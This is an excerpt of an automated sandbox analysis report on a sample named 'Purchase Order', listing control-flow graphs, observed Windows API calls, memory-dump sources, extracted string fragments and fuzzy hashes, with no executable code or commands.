                                                                                                  control_flow_graph 1143 39ea8f9a-39ea9037 GetCurrentProcess 1147 39ea9039-39ea903f 1143->1147 1148 39ea9040-39ea9074 GetCurrentThread 1143->1148 1147->1148 1149 39ea907d-39ea90b1 GetCurrentProcess 1148->1149 1150 39ea9076-39ea907c 1148->1150 1151 39ea90ba-39ea90d5 call 39ea9179 1149->1151 1152 39ea90b3-39ea90b9 1149->1152 1150->1149 1156 39ea90db-39ea910a GetCurrentThreadId 1151->1156 1152->1151 1157 39ea910c-39ea9112 1156->1157 1158 39ea9113-39ea9175 1156->1158 1157->1158
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 39EA9026
                                                                                                  • GetCurrentThread.KERNEL32 ref: 39EA9063
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 39EA90A0
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 39EA90F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387241222.0000000039EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ea0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: 1126f92cdd3750e00f76e46ba3279898fb7557fc7094ce0b6b42f464878844f8
                                                                                                  • Instruction ID: fd3ff9f165751da118aba9ad8372852864d509f79752a71e5283691afac000e0
                                                                                                  • Opcode Fuzzy Hash: 1126f92cdd3750e00f76e46ba3279898fb7557fc7094ce0b6b42f464878844f8
                                                                                                  • Instruction Fuzzy Hash: 975156B0905349CFDB14DFA9C588BAEBFF1AF89310F248059D009AB361C739A944CF65

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1165 39ea8fa8-39ea9037 GetCurrentProcess 1169 39ea9039-39ea903f 1165->1169 1170 39ea9040-39ea9074 GetCurrentThread 1165->1170 1169->1170 1171 39ea907d-39ea90b1 GetCurrentProcess 1170->1171 1172 39ea9076-39ea907c 1170->1172 1173 39ea90ba-39ea90d5 call 39ea9179 1171->1173 1174 39ea90b3-39ea90b9 1171->1174 1172->1171 1178 39ea90db-39ea910a GetCurrentThreadId 1173->1178 1174->1173 1179 39ea910c-39ea9112 1178->1179 1180 39ea9113-39ea9175 1178->1180 1179->1180
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 39EA9026
                                                                                                  • GetCurrentThread.KERNEL32 ref: 39EA9063
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 39EA90A0
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 39EA90F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387241222.0000000039EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ea0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: 40079c9fd3fb6727107a018e76441a21cde38c15e3c7a856d27752aa69e78bf8
                                                                                                  • Instruction ID: 1b3d1c60c60b913d35af1a629bc10f035a51c3ac8182ad056d5b8aa0c57bf6fe
                                                                                                  • Opcode Fuzzy Hash: 40079c9fd3fb6727107a018e76441a21cde38c15e3c7a856d27752aa69e78bf8
                                                                                                  • Instruction Fuzzy Hash: 3F5138B0901249CFDB14DFA9D589B9EBBF5FF88310F208459D009A7360D735A941CFA5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $Haq$Haq$Haq
                                                                                                  • API String ID: 0-432640594
                                                                                                  • Opcode ID: 86f71256d29adab75bce4b92169c6fb07801799ba6f826931b326cd1a54a6cbf
                                                                                                  • Instruction ID: d9bfbdab402af2850bbfecbfea20ad70cc2493f9549d7189456199e94ac1d760
                                                                                                  • Opcode Fuzzy Hash: 86f71256d29adab75bce4b92169c6fb07801799ba6f826931b326cd1a54a6cbf
                                                                                                  • Instruction Fuzzy Hash: 6CA111347052449FDF159F78889526E3BAAAFC57A0F10432AE812DB3E1CF749D42CBA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4']q$4']q$;]q
                                                                                                  • API String ID: 0-1096896373
                                                                                                  • Opcode ID: a44c587251df2804b8aa187c82771486ccbf1f750b7d06b64e4d1b23d90ff1f5
                                                                                                  • Instruction ID: 2765049594d5919dda016733fdd88d3e1774203aa8be4130555d19cdca1555e6
                                                                                                  • Opcode Fuzzy Hash: a44c587251df2804b8aa187c82771486ccbf1f750b7d06b64e4d1b23d90ff1f5
                                                                                                  • Instruction Fuzzy Hash: 7EF190303462018FDB1D9B29C964BB97BA6AF85704F6544BAE412CF3B1EB69CCC1C752
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D@$D@$D@
                                                                                                  • API String ID: 0-3330130650
                                                                                                  • Opcode ID: e48211263904239b879cfcbcb92ece7291a77f0ae38d04779b7a36cd170bbfd0
                                                                                                  • Instruction ID: a03ff14fe92b1a7dc279cd7882a196cabe5edc73db3b3ddb48f0e3bdb07a7c02
                                                                                                  • Opcode Fuzzy Hash: e48211263904239b879cfcbcb92ece7291a77f0ae38d04779b7a36cd170bbfd0
                                                                                                  • Instruction Fuzzy Hash: CCC1AF74E002698FDB64DF68C855BDEBBB2BB88300F1085E9D50DA7291EB709E85DF50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D@$D@$D@
                                                                                                  • API String ID: 0-3330130650
                                                                                                  • Opcode ID: cfab60b873276f5af1e0c04e72290efbe3d27d97588d47cf1aa045a842df6ff8
                                                                                                  • Instruction ID: 72d2bc7e360f9c4bc9602efa6540f2d6e465ea002bb4f149407d1b3ee0b2e290
                                                                                                  • Opcode Fuzzy Hash: cfab60b873276f5af1e0c04e72290efbe3d27d97588d47cf1aa045a842df6ff8
                                                                                                  • Instruction Fuzzy Hash: 5CB1BE74E002698FDB64DF68C851BDEBBB2BB88300F1085E9D50DA7291EB749E85DF50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Haq$Haq
                                                                                                  • API String ID: 0-4016896955
                                                                                                  • Opcode ID: ff6dc98f8a12d3c129c7095195a604b14dd272664d954bb18c36edc64d01e335
                                                                                                  • Instruction ID: b13ff7290fef8cbe6335408d504e2e6cf8241ff651f58f71112ca157279290d2
                                                                                                  • Opcode Fuzzy Hash: ff6dc98f8a12d3c129c7095195a604b14dd272664d954bb18c36edc64d01e335
                                                                                                  • Instruction Fuzzy Hash: F1B1D0343042558FCB199F38D864BBA7BE2AF88301F154579E946CB3A1DB76CC82D791
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ,aq$,aq
                                                                                                  • API String ID: 0-2990736959
                                                                                                  • Opcode ID: 0e7c0afa7cb3c8d4feb2bfb44fedbf91b747fb2a246fa98d59e32d83d4d97efb
                                                                                                  • Instruction ID: 5b744d792a7d825179034a436afb4b01f4ece3d76cbbf29acd8e68d33e36be9c
                                                                                                  • Opcode Fuzzy Hash: 0e7c0afa7cb3c8d4feb2bfb44fedbf91b747fb2a246fa98d59e32d83d4d97efb
                                                                                                  • Instruction Fuzzy Hash: 18817E34A08505CFCB1CCF69C8849EAB7B2BF89311B258579E815DB3A5DB31EC82DB51
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (o]q$(o]q
                                                                                                  • API String ID: 0-1858875562
                                                                                                  • Opcode ID: 71e6548dc555fdc182f0167cdf623b136ab710bd5a007108abd03a5405fa7aaf
                                                                                                  • Instruction ID: 06db8caa79238d4ab3a9c0feddb0800bdfd73e989dac643c76176d7975b95914
                                                                                                  • Opcode Fuzzy Hash: 71e6548dc555fdc182f0167cdf623b136ab710bd5a007108abd03a5405fa7aaf
                                                                                                  • Instruction Fuzzy Hash: 41719331B046058FCB08DF69D894AEEBBF6BF88710B158569E506D73A6DB34DC81CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (&]q$(aq
                                                                                                  • API String ID: 0-1602648543
                                                                                                  • Opcode ID: dcb25beff33684cf9d8b2fd0b57ba4953a632eb46886607a47ebbfa4a258eb5b
                                                                                                  • Instruction ID: e67ebd9ccfc4c47661a26f7e6d84f4ea63c5a45585e145b07e98ded13c3a9374
                                                                                                  • Opcode Fuzzy Hash: dcb25beff33684cf9d8b2fd0b57ba4953a632eb46886607a47ebbfa4a258eb5b
                                                                                                  • Instruction Fuzzy Hash: AF716F31F002199BDB05EFA9D8616EEBBB2BF85740F108529E405EB281DF34AD46CB91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D@$nKuq
                                                                                                  • API String ID: 0-3411600045
                                                                                                  • Opcode ID: 4eb0db873969f7d8e1b26e9bd80a87a33654569c9be01003fb94eefdabd9c27f
                                                                                                  • Instruction ID: 821a38b7e57b62b9c67e93202e022fedf30ce6356db1d9d89c5d35b872b923fc
                                                                                                  • Opcode Fuzzy Hash: 4eb0db873969f7d8e1b26e9bd80a87a33654569c9be01003fb94eefdabd9c27f
                                                                                                  • Instruction Fuzzy Hash: 2561A074E002199FDB04CFE9D955AEEBBB2FF88300F10842AD819AB364DB355946DF50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D@$D@
                                                                                                  • API String ID: 0-548349879
                                                                                                  • Opcode ID: 0bdf96185fe4dcbd8dd380aee2745976d283e3de71b975652454d66b3cda773a
                                                                                                  • Instruction ID: e574014e91161def5044a7021c8d3781d5984558f9ece139884f0671847740cf
                                                                                                  • Opcode Fuzzy Hash: 0bdf96185fe4dcbd8dd380aee2745976d283e3de71b975652454d66b3cda773a
                                                                                                  • Instruction Fuzzy Hash: 7651B374E012199FDB04DFA9D891AEEBBB2BF88300F108529E505AB395DB749D46CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D@$D@
                                                                                                  • API String ID: 0-548349879
                                                                                                  • Opcode ID: 9e467aa0bddbaf6d7704cd3e193e41f42a0cf370d17e2bc8452888909be4dd39
                                                                                                  • Instruction ID: 3019d959d267961d5410f83797cc7b0b06307c364a26edca1457435a9c4b4072
                                                                                                  • Opcode Fuzzy Hash: 9e467aa0bddbaf6d7704cd3e193e41f42a0cf370d17e2bc8452888909be4dd39
                                                                                                  • Instruction Fuzzy Hash: 8E51B374E012199FDB04DFA9D891AEEBBB2FF88300F108429E505B7394DB749946CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D@$D@
                                                                                                  • API String ID: 0-548349879
                                                                                                  • Opcode ID: e8e949a72b55f8b3150ef53e4257877be4d66c1ddae29b540bda5363011826ea
                                                                                                  • Instruction ID: 9b9f7fea9258f88265496f8c96c14fa05c3a1bdde583398ec4d0e090e4b245b5
                                                                                                  • Opcode Fuzzy Hash: e8e949a72b55f8b3150ef53e4257877be4d66c1ddae29b540bda5363011826ea
                                                                                                  • Instruction Fuzzy Hash: E0519074E002199FDB04DFA9D595AEEBBF1FF89300F20852AD505AB354DB349E46CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xaq$Xaq
                                                                                                  • API String ID: 0-1488805882
                                                                                                  • Opcode ID: 3c28f6701b9feb48b7932026a4aefcacece5927582b5ec9a021f6d55120d20f3
                                                                                                  • Instruction ID: e06d7be9e91c231df64a0f700d8f74be1730b41bd114b79bd83a86b0c8d8da1b
                                                                                                  • Opcode Fuzzy Hash: 3c28f6701b9feb48b7932026a4aefcacece5927582b5ec9a021f6d55120d20f3
                                                                                                  • Instruction Fuzzy Hash: A531F731B0422587DF1C4AA9A9942FEA9EAAFC4310F544439D826D3398DF74CE8596A1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8bq$TJbq
                                                                                                  • API String ID: 0-3440557903
                                                                                                  • Opcode ID: d5e4012edc94bca8113030dd7a93e7e96f4d0d56127c2cc93ee330c95f7a6332
                                                                                                  • Instruction ID: e512218bec130156146d1f7fd0737a2e41010078766a05f18436ae222dd61294
                                                                                                  • Opcode Fuzzy Hash: d5e4012edc94bca8113030dd7a93e7e96f4d0d56127c2cc93ee330c95f7a6332
                                                                                                  • Instruction Fuzzy Hash: B5312634B402088FCB44DFA8C591EDDBBBAEF88720F155554E905AF366CA71EC45CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8bq$TJbq
                                                                                                  • API String ID: 0-3440557903
                                                                                                  • Opcode ID: 57df125c2388b02aacad951e4618554c3b9ab1eac3db901df89da367b67cbcac
                                                                                                  • Instruction ID: ae8e3e4dd8bc98bd0b593e2a54484a712d692da2f7e7d6d868eed35069565ef4
                                                                                                  • Opcode Fuzzy Hash: 57df125c2388b02aacad951e4618554c3b9ab1eac3db901df89da367b67cbcac
                                                                                                  • Instruction Fuzzy Hash: 07313634B401088FCB44DFA8C591EDEBBBAEF88720F155554E905AF366CA71EC86CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LR]q
                                                                                                  • API String ID: 0-3081347316
                                                                                                  • Opcode ID: e18ac973f4675dffe3c9b2313fbb18115776473d011a70b601f5ab47e8357583
                                                                                                  • Instruction ID: 7138e694a4b6c2d8f7f639847cbc17d53a38311f4b1f7b5709d5ed650a75b8d0
                                                                                                  • Opcode Fuzzy Hash: e18ac973f4675dffe3c9b2313fbb18115776473d011a70b601f5ab47e8357583
                                                                                                  • Instruction Fuzzy Hash: 7F52E778A40619CFDB54DF28DD96B8DBBB2FB48301F1085A5D409A7364DB786E86CF80
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 39F83BC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387335769.0000000039F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39F80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39f80000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: 23d95e5db2f81978afe05dc50f0b12d6a805626cffed9cad21f5baeaa2055635
                                                                                                  • Instruction ID: 4db14d72d1b9c179b58fda15aa8c66bc3557c8260f744264917fbf48e34f717e
                                                                                                  • Opcode Fuzzy Hash: 23d95e5db2f81978afe05dc50f0b12d6a805626cffed9cad21f5baeaa2055635
                                                                                                  • Instruction Fuzzy Hash: 3351C1B1D10349DFDB14CFA9C884ADEBBB5FF49310F64852AE419AB210D775A845CF90
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 39F83BC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387335769.0000000039F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39F80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39f80000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: b9c8368fd8ea3c068cc84f986d90b645f9ee1aff7ea01a27468a83d6cfd6ea80
                                                                                                  • Instruction ID: c4806642c56becdcb2a63a3c1410c913734a60653d1a30ed2dfdd30c8a2b3898
                                                                                                  • Opcode Fuzzy Hash: b9c8368fd8ea3c068cc84f986d90b645f9ee1aff7ea01a27468a83d6cfd6ea80
                                                                                                  • Instruction Fuzzy Hash: C341B0B1D143499FDB14CF99C884ADEBBB5FF48310F64862AE819AB210D775A885CF90
                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 39F862C1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387335769.0000000039F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39F80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39f80000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: 2b3bf317a31611a7e6d15f396cb1040ac43a3fe88776edefb2acf8941edd653f
                                                                                                  • Instruction ID: 2f0b164d7958bc3b66b7c5cde13871e8345720716695120bc5579a57c3c19b8c
                                                                                                  • Opcode Fuzzy Hash: 2b3bf317a31611a7e6d15f396cb1040ac43a3fe88776edefb2acf8941edd653f
                                                                                                  • Instruction Fuzzy Hash: AF413AB5904309CFDB44DF99C448AAAFBF5FF88310F24C899E518AB321D734A841CBA0
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 39EA9277
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387241222.0000000039EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ea0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 4409b51d61ad2a817c016cc9b5a71297acdb46651d4a94a0ad73aa93b9383896
                                                                                                  • Instruction ID: f96edaac0a87d4bc579d0a516d0787a7e783b747261d467bd2940e950ac92832
                                                                                                  • Opcode Fuzzy Hash: 4409b51d61ad2a817c016cc9b5a71297acdb46651d4a94a0ad73aa93b9383896
                                                                                                  • Instruction Fuzzy Hash: 4521C4B59002489FDB10CFAAD984ADEBBF5FF48310F14841AE958A7310D379A944CFA5
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 39EA9277
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387241222.0000000039EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ea0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: d2003fffc2e7c29cc00f1a9142f5dfe8771499266078581d279ff416193330fd
                                                                                                  • Instruction ID: ec2ecf91c293ebf54b375637dec96156a142a2feba76637f16f0f61153cc9966
                                                                                                  • Opcode Fuzzy Hash: d2003fffc2e7c29cc00f1a9142f5dfe8771499266078581d279ff416193330fd
                                                                                                  • Instruction Fuzzy Hash: 391118B5900209DFDB10CFAAE444AEEBBF4EF49310F24801AE559A7320C338DA50DF61
                                                                                                  APIs
                                                                                                  • OleInitialize.OLE32(00000000), ref: 39F8878D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387335769.0000000039F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39F80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39f80000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2538663250-0
                                                                                                  • Opcode ID: af958a92c935567f26699d2ea0787a81d40e563d716ea5a9f5afab4a2e0de7bf
                                                                                                  • Instruction ID: 2a864a21d7097262004ad07f8a00e30065e5f92209d3e1925136cdde43844df2
                                                                                                  • Opcode Fuzzy Hash: af958a92c935567f26699d2ea0787a81d40e563d716ea5a9f5afab4a2e0de7bf
                                                                                                  • Instruction Fuzzy Hash: 4C1100B5900249CFCB20DFAAD445BEEBFF4EF48310F20885AD569A7210C379A544CFA6
                                                                                                  APIs
                                                                                                  • OleInitialize.OLE32(00000000), ref: 39F8878D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387335769.0000000039F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39F80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39f80000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2538663250-0
                                                                                                  • Opcode ID: cec856aa9e705487c23e79e4e0493ab4e3b1139ef95be7f7575ff1704228a38a
                                                                                                  • Instruction ID: ffac68717185f3bd9041bb7ba60a1dd5799a3a3ce41b76da8cbe946e08386a7c
                                                                                                  • Opcode Fuzzy Hash: cec856aa9e705487c23e79e4e0493ab4e3b1139ef95be7f7575ff1704228a38a
                                                                                                  • Instruction Fuzzy Hash: F11115B59043498FDB20DF9AD444B9EBBF4EF48320F248459E528A7300C379A940CFE5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Haq
                                                                                                  • API String ID: 0-725504367
                                                                                                  • Opcode ID: c99137fb2fa3aac51e06b7b66739217e22b41a2355aa219f23618c41656cc927
                                                                                                  • Instruction ID: 2fb776910a3e51f14fc5de6dc7c9a831cd48e16dc4c13eed62ba5e77a53da6ec
                                                                                                  • Opcode Fuzzy Hash: c99137fb2fa3aac51e06b7b66739217e22b41a2355aa219f23618c41656cc927
                                                                                                  • Instruction Fuzzy Hash: 2731C371B052489FCB08DFB898545AE7FFAAFC9300B1085BDE949DB262DE348D46C791
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F
                                                                                                  • API String ID: 0-2730988801
                                                                                                  • Opcode ID: f61a2f293d5fb555a2b747fff1f72215cc40fcb5439f0330d61b0daf4bb0c12a
                                                                                                  • Instruction ID: f7aee9eea13a635082c9d2b7407e157ca72dba9e0e784ce27554122a7dae5631
                                                                                                  • Opcode Fuzzy Hash: f61a2f293d5fb555a2b747fff1f72215cc40fcb5439f0330d61b0daf4bb0c12a
                                                                                                  • Instruction Fuzzy Hash: B7316834D092498FCB05DFB8D8046EEBFF4EF4A310F0041AAD444EB265EB351A95CBA2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Haq
                                                                                                  • API String ID: 0-725504367
                                                                                                  • Opcode ID: bb71224d073ae0de6ea81497838fbc10c33a05e473a1af0f662ee8169e0ab59b
                                                                                                  • Instruction ID: 1ab857b878048b61f2eff610ddd663bb77437955f53f23cdee96b2aa3cf8266c
                                                                                                  • Opcode Fuzzy Hash: bb71224d073ae0de6ea81497838fbc10c33a05e473a1af0f662ee8169e0ab59b
                                                                                                  • Instruction Fuzzy Hash: D221E6306082859FDB059F68D854AAE7FBAEF89351F1481AAD8458B266CF314E46C741
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: af8ca7284bd1a98675fbcc9063bf13b900d7a3b64d1cc3244e6356f607c772b1
